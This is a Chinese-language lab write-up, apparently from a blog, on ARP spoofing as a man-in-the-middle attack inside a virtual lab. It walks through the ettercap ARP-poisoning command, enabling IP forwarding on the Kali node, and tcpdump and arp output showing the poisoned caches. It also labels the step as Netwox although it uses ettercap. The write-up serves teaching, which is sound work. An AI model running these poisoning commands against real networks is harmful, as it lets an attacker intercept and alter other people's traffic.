ARP协议攻击与防御 ARP欺骗

【目的】

在本实验中,针对ARP协议无验证缺陷,进行ARP欺骗以实施中间人攻击,通过实验实现

  • 熟悉ARP欺骗原理;
  • 掌握中间人攻击原理。

【环境】

根据提供的实验环境,OWASP节点和SeedUbuntu节点之间正常通行时数据包将不会经过Kali节点。攻击节点Kali将通过ARP欺骗成文中间人,从而截获SeedUbuntu和OWASP节点之间的数据包,并可对数据包内容进行篡改。

SeedUbuntu和OWASP节点的网络配置只需在虚拟机的设置菜单中更改网络连接方式为NAT即可。

【工具】

实验中的虚拟机

【原理】

ARP欺骗攻击的根源在于ARP协议在设计时认为局域网内部的所有用户都是可信的,当攻击者渗透进入内网后, 通过向局域网内节点缓存中注入伪造的IP/MAC映射关系,从而进行欺骗,成为局域网内的中间人节点,即可以监听并进一步篡改数据包。

【步骤】

注:这里的ip是测试环境的ip,自己做实验时需要替换成实验环境中的ip

1.Seed Ubuntu节点与OWASP节点正常通行

在SeedUbuntu节点下,利用浏览器访问OWASP的Web服务http://192.168.200.125,如下图所示:

2.Kali节点进行ARP欺骗攻击

1) 查看攻击前ARP缓存表

在实施攻击前,在SeedUbuntu和OWASP分别输入arp命令,确认ARP缓存状态,如下所示:

root@ubuntu:~# arp -a
? (192.168.200.2) at 00:50:56:fc:e8:4b [ether] on eth0
? (192.168.200.125) at 00:0c:29:41:23:0e [ether] on eth0

2) 利用Netwox进行中间人欺骗攻击,即同时发送伪造的ARP响应报文到Seed Ubuntu和OWASP节点

root@kali:~# ettercap -Tqi eth0 -M arp:remote /192.168.200.125// /192.168.200.124//
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
2 hosts added to the hosts list...
ARP poisoning victims:
 GROUP 1 : 192.168.200.125 00:0C:29:41:23:0E
 GROUP 2 : 192.168.200.124 00:0C:29:2C:C0:07
Starting Unified sniffing...

3) 开启Kali节点的IP转发功能:

root@kali:~# cat /proc/sys/net/ipv4/ip_forward
0
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

4) 分析ARP欺骗攻击数据包

在Seed Ubuntu或OWASP节点下,执行tcpdump命令,查看ARP数据包,如下所示:

root@ubuntu:/home/seed# tcpdump -i eth0 arp -n 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
04:34:33.690429 ARP, Reply 192.168.200.124 is-at 00:0c:29:da:ee:f6, length 46
04:34:33.690445 ARP, Reply 192.168.200.125 is-at 00:0c:29:da:ee:f6, length 46

可以看到,192.168.200.124和192.168.200.125的MAC映射地址全被设置为Kali节点的MAC地址00:0c:29:da:ee:f6,此时再执行arp命令查看arp缓存,如下所示:

root@ubuntu:/home/seed# arp -a
? (192.168.200.2) at 00:50:56:fc:e8:4b [ether] on eth0
? (192.168.200.125) at 00:0c:29:da:ee:f6 [ether] on eth0

3.中间人数据分析

在SeedUbuntu节点下,再次利用浏览器访问OWASP的Web服务http://192.168.200.125,同时在Kali节点下开启Wireshark, 可以看到SeedUbuntu和OWASP间的数据包经由Kali节点进行转发:

wireshark 要进行ip过滤:!tcp.port==3389

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值